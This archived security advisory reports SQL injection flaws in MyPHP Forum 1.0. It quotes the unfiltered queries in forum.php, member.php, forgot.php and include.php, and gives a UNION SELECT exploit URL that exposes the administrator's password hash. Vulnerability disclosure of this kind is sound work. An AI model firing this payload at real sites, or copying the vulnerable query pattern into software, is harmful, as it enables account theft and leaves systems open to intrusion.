Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web BBS :: etc :: hack7256.htm

myPHP Forum 1.0 several SQL injection bugs
Several SQL injection bugs in myPHP Forum v.1.0

// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: 

[Product Description]
MyPHP Forum is a simple message board script with limited features.

Several SQL Injection vulnerabilities may lead to viewing of sensetive information,
including hash of user's password.

Positive part of user outbound variables used as they are in SQL queries.

[1] script name: forum.php

$query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid='$fid'") or die(mysql_error());
$nav = mysql_fetch_array($query);

Possible SQL injection through $fid variable that has no filtration.

[2] script name: member.php

if($action == "viewpro") {
        $member = $HTTP_GET_VARS['member'];
        $sql =  "SELECT * FROM $db_member WHERE username='$member'";
        $query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die("cant execute $sql");
        $member = mysql_fetch_array($query);

SQL code injection 
member.php?action=viewpro&member=[SQL code]

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1
will show administrator's name and password hash (in the "Yahoo" field).  

Password cripted by encrypt() function:
function encrypt($string) {
    $crypted = crypt(md5($string), md5($string));
    return $crypted;

[3] script name: forgot.php

$email = $_REQUEST['email'];
        if (isset($email)) {
        $sql="SELECT * FROM $db_member WHERE email='$email'";  
$result = mysql_query("SELECT username FROM $db_member WHERE email='$email'");
                        $username = mysql_result($result, 0);
                        $msg = "
                        Hello $username,
$email variable has no filtration. 
IMPACT: Possible SQL injection through this variable.

[4] script name: include.php
This is the most important script that is the part of all others.
$nbuser & $nbpass variables are not filtering. 

$query = mysql_query("SELECT * FROM $db_member WHERE username='$nbuser'")
IMPACT: possible SQL injection through $nbuser.

P.S. all bugs are actual for magic_quotes_gpc=0.

/* ================================================== */
/* -- security games & challenges */ 
/* ================================================== */
/* greets to:, D0G4 & all quest hunters %)*/
/* ================================================== */

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH